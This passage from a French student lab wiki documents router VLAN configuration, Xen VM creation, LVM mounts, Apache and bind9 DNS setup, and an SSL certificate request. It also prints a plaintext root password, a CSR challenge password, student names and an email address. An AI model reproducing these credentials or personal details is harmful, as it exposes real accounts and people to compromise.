   standby 7 ip 10.60.6.252&lt;br /&gt;
   standby 7 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan42&lt;br /&gt;
   ip address 193.48.57.174 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 42 ip 193.48.57.172&lt;br /&gt;
   standby 42 preempt&lt;br /&gt;
   exit&lt;br /&gt;
          &lt;br /&gt;
   interface Vlan130&lt;br /&gt;
   ip address 192.168.222.2 255.255.255.248&lt;br /&gt;
   ipv6 address FE80::42:3 link-local&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;/div&gt;</summary>
		<author><name>Pcoint</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51418</id>
		<title>TP sysres IMA2a5 2019/2020 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51418"/>
				<updated>2019-11-29T12:53:43Z</updated>
		
		<summary type="html">&lt;p&gt;Pcoint : /* Creation du Raid5 avec mdadm */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Fichier:Rex4ever.PNG|500px|right|frameless|© Copyright Ginette]]&lt;br /&gt;
== Accueil/Descriptif du groupe ==&lt;br /&gt;
Bienvenue sur la page du groupe 3. Le découpage en groupe par numéro permet de se repérer plus facilement dans l'adressage des différents réseaux nécessaire.Ce groupe est constitué de :&lt;br /&gt;
&lt;br /&gt;
*Pascal Coint&lt;br /&gt;
*Quentin Weisbecker&lt;br /&gt;
&lt;br /&gt;
Ce TP consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système nous avons à installer une machine virtuelle Xen avec l'OS Devian ainsi qu'implanter un auto-commutateur et un point d'accès. Nous effectuerons pas la suite des tests d'intrusion sur ces points d'accès afin de voir la vulnérabilité des différents protocoles de clé. Pour notre cas, nous nous étendrons sur les protocoles [https://fr.wikipedia.org/wiki/Wired_Equivalent_Privacy WEP] et [https://fr.wikipedia.org/wiki/Wi-Fi_Protected_Access WPA]-PSK.&lt;br /&gt;
&lt;br /&gt;
== Informations importantes == &lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|4&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|10.60.3.0/24 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|2001:660:4401:60B3::/64&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de l'ordinateur portable&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Requin&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Repérage à l'étiqueteuse&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|IMA2A5 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth03&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== La machine Virtuelle sous XEN : ima2a5-rex4ever ==&lt;br /&gt;
=== Note importante ===&lt;br /&gt;
Comme indiqué dans le sujet, nous allons créer une machine virtuelle via l'utilitaire [https://wiki.xenproject.org/wiki/Xen_Project_4.11_Man_Pages Xen] Linux sur le '''dom0 cordouan.insecserv.deule.net''' via la commande '''ssh''' et le compte administrateur usuel.Sur notre machine virtuelle nous créerons par la suite un compte pifou et un compte root identique au Zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Création de notre machine virtuelle XEN ===&lt;br /&gt;
Après s'être connecté, il faut maintenant creer la machine virtuelle :      &lt;br /&gt;
      xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
L'installation se lance alors :&lt;br /&gt;
&lt;br /&gt;
      root@cordouan:~# xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
      Use of uninitialized value within %DIST in pattern match (m//) at /usr/bin/xen-create-image line 1803.&lt;br /&gt;
      &lt;br /&gt;
      General Information&lt;br /&gt;
      --------------------&lt;br /&gt;
      Hostname       :  ima2a5-rex4ever&lt;br /&gt;
      Distribution   :  ascii&lt;br /&gt;
      Mirror         :  http://fr.deb.devuan.org/merged/&lt;br /&gt;
      Partitions     :  swap            512M  (swap)&lt;br /&gt;
                        /               4G    (ext4)&lt;br /&gt;
      Image type     :  sparse&lt;br /&gt;
      Memory size    :  256M&lt;br /&gt;
      Kernel path    :  /boot/vmlinuz-4.9.0-6-amd64&lt;br /&gt;
      Initrd path    :  /boot/initrd.img-4.9.0-6-amd64&lt;br /&gt;
      &lt;br /&gt;
      Networking Information&lt;br /&gt;
      ----------------------&lt;br /&gt;
      IP Address     : DHCP [MAC: xxxxxxx]&lt;br /&gt;
      &lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating swap on /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating ext4 filesystem on /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      Installation method: debootstrap&lt;br /&gt;
&lt;br /&gt;
L'installation peut sembler bloquer sur cette dernière ligne mais il est possible de voir ce qui se passe en arrière plan via un second terminal en SSH et la commande SSH&lt;br /&gt;
      tail -f /var/xen-tools/ima2a5-rex4ever.log&lt;br /&gt;
&lt;br /&gt;
A la fin de l'installation,on obtient le mot de passe root et des informations importantes :&lt;br /&gt;
      Installation Summary&lt;br /&gt;
      ---------------------&lt;br /&gt;
      Hostname        :  ima2a5-rex4ever&lt;br /&gt;
      Distribution    :  ascii&lt;br /&gt;
      MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
      IP Address(es)  :  dynamic&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
      Root Password   :  sZzrYYPFZEwxsfmFghddGW5&lt;br /&gt;
&lt;br /&gt;
=== Ajout du bridge à ima2a5-rex4ever.cfg ===&lt;br /&gt;
Dans un premier lieu, on regarde l'existence du brige sur l'hote distant via : &lt;br /&gt;
      brctl show&lt;br /&gt;
Ce qui nous retourne : &lt;br /&gt;
      bridge name	bridge id		STP enabled	interfaces&lt;br /&gt;
      IMA2a5		8000.000af75e3dc0	no		eth1&lt;br /&gt;
      eth2&lt;br /&gt;
      if3.0&lt;br /&gt;
      IMA5sc		8000.000af75e3dc2	no		eth3&lt;br /&gt;
      eth5&lt;br /&gt;
      Insecure		8000.c81f66c22b83	no		vlan6&lt;br /&gt;
      L3MRIT		8000.000af763ae2d	no		eth4&lt;br /&gt;
      StudentsInfo		8000.c81f66c22b83	no		vlan50&lt;br /&gt;
On voit bien l'existence du bridge '''IMA2a5''', il faut donc l'ajouter à notre .cfg qui est le fichier de configuration de la VM ('''/etc/xen/ima2a5-rex4ever.cfg''')&lt;br /&gt;
et on modifie la ligne commençant par '''vif =''' et on ajoute le bridge de la manière suivante : &lt;br /&gt;
      vif = ['MAC:xxxxx,bridge = IMA2a5']&lt;br /&gt;
Après avoir modifié ce fichier, il faut le parser : xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
Une erreur '''NUMA placement failed, performance might be affected''' peut apparaître mais elle indique juste que xen n'arrive pas à disposer les VM comme il veut sur les procs, mais cela n'impactera que les performances nous passons outre ce problème.&lt;br /&gt;
&lt;br /&gt;
=== Démarrer la VM et accès console ===&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl console ima2a5-rex4ever&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). Après nous être logué,on change le mot de passe qui devient le même que le mot de passe du root de '''corduan''' ou d'une zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Montage des répertoires /var et /home ===&lt;br /&gt;
==== Creation des disques logique ====&lt;br /&gt;
Il faut d'abord créer les partitions logiques sur corduan via : &lt;br /&gt;
     root@cordouan:~#lvcreate -L10G -n ima2a5-rex4ever-home virtual&lt;br /&gt;
     root@cordouan:~#lvcreate -L10G -n ima2a5-rex4ever-var virtual&lt;br /&gt;
Il est possible qu'il affiche l'avertissement suivant : '''WARNING: ext2 signature detected on /dev/virtual/ima2a5-rex4ever-home at offset 1080. Wipe it? [y/n]'''&lt;br /&gt;
repondre alors oui(y).&lt;br /&gt;
Il est possible de verifier que votre partition a bien été crée via la commande :&lt;br /&gt;
      lvdisplay&lt;br /&gt;
On obtient alors dans la liste de toutes les partitions, nous deux partitions précedemment créées&lt;br /&gt;
      --- Logical volume ---&lt;br /&gt;
      LV Path                '''/dev/virtual/ima2a5-rex4ever-home'''&lt;br /&gt;
      LV Name                ima2a5-rex4ever-home&lt;br /&gt;
      VG Name                virtual&lt;br /&gt;
      LV UUID                mhJqFx-zO1m-PlOU-Zmeu-8NGx-7UUO-c2g9dP&lt;br /&gt;
      LV Write Access        read/write&lt;br /&gt;
      LV Creation host, time cordouan, 2019-11-08 08:47:26 +0000&lt;br /&gt;
      LV Status              available&lt;br /&gt;
      # open                 0&lt;br /&gt;
      LV Size                10.00 GiB&lt;br /&gt;
      Current LE             2560&lt;br /&gt;
      Segments               1&lt;br /&gt;
      Allocation             inherit&lt;br /&gt;
      Read ahead sectors     auto&lt;br /&gt;
      - currently set to     256&lt;br /&gt;
      Block device           254:3&lt;br /&gt;
     --- Logical volume ---&lt;br /&gt;
     LV Path                '''/dev/virtual/ima2a5-rex4ever-var'''&lt;br /&gt;
     LV Name                ima2a5-rex4ever-var&lt;br /&gt;
     VG Name                virtual&lt;br /&gt;
     LV UUID                9Bnl6S-6CE5-CtO2-hD8f-RidD-sps5-b1mrWg&lt;br /&gt;
     LV Write Access        read/write&lt;br /&gt;
     LV Creation host, time cordouan, 2019-11-08 08:50:57 +0000&lt;br /&gt;
     LV Status              available&lt;br /&gt;
     # open                 0&lt;br /&gt;
     LV Size                10.00 GiB&lt;br /&gt;
     Current LE             2560&lt;br /&gt;
     Segments               1&lt;br /&gt;
     Allocation             inherit&lt;br /&gt;
     Read ahead sectors     auto&lt;br /&gt;
     - currently set to     256&lt;br /&gt;
     Block device           254:4&lt;br /&gt;
Il faut maintenant faire pointer le système de fichier sur nos deux nouveaux repertoires pour finir la création : &lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-home&lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-var&lt;br /&gt;
Nos deux disques sont maintenant prêt, il ne reste plus qu'a les connecter avec la VM. Pour cela, il faut modifier le '''.cfg''' de nouveau.&lt;br /&gt;
&lt;br /&gt;
==== Modification du fichier de configuration ====&lt;br /&gt;
Retournons donc dans le fichier '''/etc/xen/ima2a5-rex4ever.cfg''' et dans la section disk modifier tel que : &lt;br /&gt;
&lt;br /&gt;
     disk    	= [&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/disk.img,xvda2,w',&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/swap.img,xvda1,w',               &lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-home,xvdb1,w',&lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-var,xvdb2,w',&lt;br /&gt;
                  ]&lt;br /&gt;
&lt;br /&gt;
Pour prendre effet il faut redémarrer la VM à l'aide des commandes&lt;br /&gt;
    xl shutdown ima2a5-rex4ever&lt;br /&gt;
    xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
&lt;br /&gt;
==== Configuration pour forcer le montage à chaque démarrage de la VM ====&lt;br /&gt;
Il faut ensuite aller dans la VM dans '''/etc/fstab''' et ajouter &lt;br /&gt;
    /dev/xvdb1		/home		ext4		defaults				0		2&lt;br /&gt;
    #/dev/xvdb2		/var		ext4		defaults				0		2&lt;br /&gt;
&lt;br /&gt;
Ces deux lignes permettent d'assurer que les 2 disques /var et /home soient pris en compte au démarrage de la VM.('''ATTENTION POUR LE MOMENT BIEN LAISSER # DEVANT LA 2eme LIGNE''')&lt;br /&gt;
Relancer la machine comme précédemment expliqué et testé que le /home fonctionne.&lt;br /&gt;
Pour le /var c'est un peu plus compliqué comme manipulation et il faut faire EXTREMENT attention , une fausse manipulation peut tuer la machine.&lt;br /&gt;
    mount /dev/xvdb2 /mnt&lt;br /&gt;
    rm -rf /mnt/lock&lt;br /&gt;
    rm -rf /mnt/log&lt;br /&gt;
    rm -rf /mnt/run&lt;br /&gt;
    mv /var/* /mnt&lt;br /&gt;
    vi /etc/fstab&lt;br /&gt;
Maintenant decommentez la deuxième ligne que vous aviez ajouté précedemment. Puis il faut lancer la commande :&lt;br /&gt;
    umount /mnt    &lt;br /&gt;
    mount -a&lt;br /&gt;
A l'aide de la commande '''fdisk -l''' depuis la VM, on peut verifier que nos quatres disques sont bien montés.De même avec '''df''' on obtient bien dans la liste les lignes : &lt;br /&gt;
      Filesystem		1K-blocks	Used	Available	Use%	Mounted on&lt;br /&gt;
     udev		75004		0 	75004		0%	/dev&lt;br /&gt;
     tmpfs          	23824		76 	23748		1%	/run&lt;br /&gt;
     /dev/xvda2   	4062912		459920	3376896		12%	/&lt;br /&gt;
     tmpfs           	5120		0  	5120		0%	/run/lock&lt;br /&gt;
     tmpfs         	152500  	0	152500		0%	/run/shm&lt;br /&gt;
     /dev/xvdb1  	10321208	23028   9773892		1%	/home&lt;br /&gt;
     /dev/xvdb2  	10321208	71076   9725844		1%	/var&lt;br /&gt;
La machine est donc prête, on peut passer à l'installation des paquetages linux nécessaires&lt;br /&gt;
=== Mise en place de l'adresse statique ===&lt;br /&gt;
Précedemment nous avions mis l'adresse en DHCP or il est demandé d'avoir une adresse statique (pour notre groupe il s'agit de  ''' 193.48.57.163/28 ''' )&lt;br /&gt;
&lt;br /&gt;
=== Paquetage Linux ===&lt;br /&gt;
Pour commencer, on va tout d'abord mettre le système à jour via : &lt;br /&gt;
    sudo apt-get update&lt;br /&gt;
==== Paquetages nécessaires pour le SSH ====&lt;br /&gt;
'''OpenSSH''' est un ensemble d'outils libres pour établir des communications chiffrées, donc sécurisées, sur un réseau informatique grâce au protocole '''SSH''' (Secure SHell).&lt;br /&gt;
Il chiffre tout le trafic (mots de passe y compris), via une combinaison astucieuse de chiffrement symétrique et asymétrique. '''OpenSSH''' fournit également d'autres méthodes d'authentification alternatives au traditionnel mot de passe.&lt;br /&gt;
Comme son nom l'indique, OpenSSH est développé dans le cadre du projet '''OpenBSD'''.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Nom de la bibliothèque !! Descriptif !! Commande&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt-get install openssh-client&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt install openssh-server&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, SSH est déjà présent sur la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur Web Apache2 ====&lt;br /&gt;
Le logiciel libre Apache HTTP Server (Apache) est un serveur HTTP créé et maintenu au sein de la fondation Apache. C'est le serveur HTTP le plus populaire du World Wide Web. Il est distribué selon les termes de la licence Apache. &lt;br /&gt;
Pour l'installer, il faut taper la commande : &lt;br /&gt;
    apt install apache2&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur DNS/DNSSEC bind ====&lt;br /&gt;
Le service DNS (Domain Name System) est un service TCP/IP permettant la correspondance entre un nom de domaine qualifié (FQDN : Fully Qualified Domain Name) et une adresse IP. Ainsi, grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP.Un serveur qui héberge le service DNS est appelé &amp;quot;serveur de noms&amp;quot;. Ubuntu est livré par défaut avec BIND (Berkley Internet Naming Daemon), le serveur DNS le plus utilisé sur Internet. Pour installer bind9 :&lt;br /&gt;
    apt install bind9&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires le gestionnaire de RAID Logiciel Mdadm ====&lt;br /&gt;
Mdadm est une solution de RAID logiciel très fiable et très répandue dans la communauté Linux. Ce paquetage sera nécessaire pour la création d'un RAID5&lt;br /&gt;
   apt install mdadm&lt;br /&gt;
&lt;br /&gt;
== Le Site Web : HTTP ==&lt;br /&gt;
=== Achat d'un nom de domaine ===&lt;br /&gt;
Pour la réalisation de ce TP, nous avons dû acheter un nom de domaine via le site [https://www.gandi.net/fr Gandi.net] . On retiendra que notre nom de domaine est : [https://www.ima2a5-rex4ever.site rex4ever.site].&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage apache2 ===&lt;br /&gt;
Après avoir installé Apache2 sur la machine ( [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA2a5_2019/2020_G3#Paquetages_n.C3.A9cessaires_pour_le_serveur_Web_Apache2 voir ici]), il faut le paramétrer correctement (je me suis servi de [https://doc.ubuntu-fr.org/apache2 ce site]).Pour cela, on commence configurer le '''.conf''' Pour cela, on le crée via la commande '''nano /etc/sites-available/ima2a5-rex4ever.site.conf''' et on renseigne alors dans le fichier les détails suivants :&lt;br /&gt;
    &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
        ServerName ima2a5-rex4ever.site&lt;br /&gt;
        ServerAlias www.ima2a5-rex4ever.site&lt;br /&gt;
        DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
        &amp;lt;Directory &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&amp;gt;&lt;br /&gt;
                Options +FollowSymLinks&lt;br /&gt;
                AllowOverride all&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
        ErrorLog /var/log/apache2/error.ima2a5-rex4ever.site.log&lt;br /&gt;
        CustomLog /var/log/apache2/access.ima2a5-rex4ever.site.com.log combined&lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
Maintenant qu'il est configuré, on peut déployer le site via : &lt;br /&gt;
    a2ensite ima2a5-rex4ever.site&lt;br /&gt;
Puis, on recharge la configuration de l'utilitaire Apache 2 :&lt;br /&gt;
    service apache2 reload&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage du DNS ===&lt;br /&gt;
Le DNS (Domain Name Server) est un serveur qui permet de rattacher un nom à une IP et ainsi c'est lui qui permet de faire le lien entre le nom d'un site et son contenu&lt;br /&gt;
==== Glue Records sur Gandi ====&lt;br /&gt;
Le Glue Record permet de créer des alias et ainsi de lier des IP et à des noms.C'est fort pratique pour simplifier la configuration.Pour se faire il faut se rendre dans Domain , cliquer sur le nom de notre site , aller dans l'onglet Glue Records et cliquer sur ADD&lt;br /&gt;
   name : dns.ima2a5-rex4ever.site&lt;br /&gt;
   ip adresse(s) : 193.48.57.163&lt;br /&gt;
==== Affecter le DNS du coté de Gandi.net ====&lt;br /&gt;
Par défaut, les serveurs de noms (DNS) sont 3 serveurs de DNS Live Gandi, il faut ajouter les serveurs externes :&lt;br /&gt;
*ns6.gandi.net  '''217.70.177.40'''&lt;br /&gt;
*dns.ima2a5-rex4ever.site   '''193.48.57.163'''&lt;br /&gt;
'''Note:''' il faut compter 12 à 24 heures pour la propagation sur Internet.&lt;br /&gt;
==== Le paramétrage de bind9 ====&lt;br /&gt;
Le paramétrage repose sur la configuration de ses 3 fichiers :&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.options =====&lt;br /&gt;
Ce fichier permet de gérer les DNS authorisés (de manière générale) à récuperer des informations de notre site. On le modifie pour permettre au dns de gandi de récuperer les données :&lt;br /&gt;
&lt;br /&gt;
     options {&lt;br /&gt;
     &lt;br /&gt;
         // forwarders {&lt;br /&gt;
         //     0.0.0.0;&lt;br /&gt;
         // };&lt;br /&gt;
         // dnssec-validation auto;&lt;br /&gt;
         auth-nxdomain no;    # conform to RFC1035&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         '''allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };'''&lt;br /&gt;
     };&lt;br /&gt;
     &lt;br /&gt;
     '''acl &amp;quot;allowed_to_transfer&amp;quot; {'''&lt;br /&gt;
        ''' 217.70.177.40/32; // adresse IP du dns6.gandi.net'''&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.local =====&lt;br /&gt;
Il faut maintenant déclarer à Bind9 le nom de notre fichier de configuration de DNS sous forme de zone , on le fait via ce fichier. On lui renseigne la zone : &lt;br /&gt;
    &lt;br /&gt;
     zone &amp;quot;ima2a5-rex4ever.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.ima2a5-rex4ever.site&amp;quot;;&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== le fichier /etc/bind/db.ima2a5-rex4ever.site=====&lt;br /&gt;
Enfin, il faut créer le fichier de configuration précedemment appelé : &lt;br /&gt;
&lt;br /&gt;
   ;&lt;br /&gt;
   ; BIND data file for local loopback interface&lt;br /&gt;
   ;&lt;br /&gt;
   $TTL    604800&lt;br /&gt;
   @       IN      SOA     dns.ima2a5-rex4ever.site. root@ima2a5-rex4ever.site. (  &amp;lt;= METTRE UNE ADRESSE BIDON , pas necessaire&lt;br /&gt;
                           21112019        ; Serial&lt;br /&gt;
                            604800         ; Refresh&lt;br /&gt;
                             86400         ; Retry&lt;br /&gt;
                           2419200         ; Expire&lt;br /&gt;
                            604800 )       ; Negative Cache TTL&lt;br /&gt;
   ;&lt;br /&gt;
   @       IN      NS      dns.ima2a5-rex4ever.site.  &amp;lt;= DN du site &lt;br /&gt;
   @       IN      NS      ns6.gandi.net.&amp;lt;= DNS de gandi&lt;br /&gt;
   dns     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE DNS&lt;br /&gt;
   www     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE SITE&lt;br /&gt;
&lt;br /&gt;
Après 5 minutes de cuisson et avoir relancé bind9, c'est prêt le site en http est accessible et visualisable! On peut acceder au site internet http://www.ima2a5-rex4ever.site !&lt;br /&gt;
&lt;br /&gt;
== Le Site Web : HTTPS ==&lt;br /&gt;
Le SSL (Secure Socket Layer) / TLS (Transport Layer Security) est le protocole de sécurité le plus répandu qui créé un canal sécurisé entre deux machines communiquant sur Internet ou un réseau interne. Dans notre société centrée sur un Internet vulnérable, le SSL est généralement utilisé lorsqu'un navigateur doit se connecter de manière sécurisée à un serveur web.&lt;br /&gt;
&lt;br /&gt;
=== Generation d'un certificat ===&lt;br /&gt;
&lt;br /&gt;
La première étape pour générer un certificat est de concevoir un jeu de 2 clefs qui sont un '''.key''' et un '''.csr''' &lt;br /&gt;
Pour obtenir ces deux fichiers, nous utilisons l'utilitaire '''OpenSSL'''.&lt;br /&gt;
      openssl req -nodes -newkey rsa:2048 -sha256 -keyout ima2a5-rex4ever.key -out ima2a5-rex4ever.csr &lt;br /&gt;
&lt;br /&gt;
'''Mais alors comment marche cette commande?'''&lt;br /&gt;
Après avoir lu le descriptif que l'on peut obtenir via [http://www.delafond.org/traducmanfr/man/man1/openssl.1.html man openssl], il en ressort que les arguments sont :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Argument !! explication&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|req&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Gestion X.509 Certificate Signing Request (CSR). &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-nodes&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Pas de chiffrage sur la clef privée (option arbitraire no des)&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-newkey rsa:2048&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|demande de Génération d'une paire de clef RSA de 2048 bits et d'une demande de certificat.&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-keyout ima2a5-rex4ever.key&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre .key&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-out ima2a5-rex4ever.csr &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre demande de certificat .csr&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
Pour générer en bon éduforme notre demande,l'utilitaire a besoin des informations, voici ce que nous avons répondu:&lt;br /&gt;
&lt;br /&gt;
      Country Name (2 letter code) [AU]:'''FR'''&lt;br /&gt;
      State or Province Name (full name) [Some-State]:'''Nord'''&lt;br /&gt;
      Locality Name (eg, city) []:'''Lille'''&lt;br /&gt;
      Organization Name (eg, company) [Internet Widgits Pty Ltd]:'''Polytech Lille'''&lt;br /&gt;
      Organizational Unit Name (eg, section) []:'''IMA2A5'''&lt;br /&gt;
      Common Name (e.g. server FQDN or YOUR name) []:'''ima2a5-rex4ever.site'''&lt;br /&gt;
      Email Address []:'''pascal.coint@polytech-lille.net'''&lt;br /&gt;
      &lt;br /&gt;
      Please enter the following 'extra' attributes&lt;br /&gt;
      to be sent with your certificate request&lt;br /&gt;
      A challenge password []:'''glopglop!'''&lt;br /&gt;
      Optionnal informations :&lt;br /&gt;
&lt;br /&gt;
==== Affectation du certificat sur Gandi.net ====&lt;br /&gt;
Après avoir répondu , il génère alors 2 fichiers. Le '''.key''' est notre clef privée elle restera donc en notre unique possession. On partage avec gandhi (qui est également un générateur de certificat) notre '''.csr'''. Il va donc étudier la validité de notre domaine et le certifier ou non.&lt;br /&gt;
&lt;br /&gt;
''' Contenu de notre CSR'''&lt;br /&gt;
      -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
      MIIDBTCCAe0CAQAwgaUxCzAJBgNVBAYTAkZSMQ0wCwYDVQQIDAROb3JkMQ4wDAYD&lt;br /&gt;
      VQQHDAVMaWxsZTEXMBUGA1UECgwOUG9seXRlY2ggTGlsbGUxDzANBgNVBAsMBklN&lt;br /&gt;
      QTJBNTEdMBsGA1UEAwwUaW1hMmE1LXJleDRldmVyLnNpdGUxLjAsBgkqhkiG9w0B&lt;br /&gt;
      CQEWH3Bhc2NhbC5jb2ludEBwb2x5dGVjaC1saWxsZS5uZXQwggEiMA0GCSqGSIb3 &lt;br /&gt;
      DQEBAQUAA4IBDwAwggEKAoIBAQDBKS9p8572UiXo2W1dAiKEKLq+B6ge/si0AhMH&lt;br /&gt;
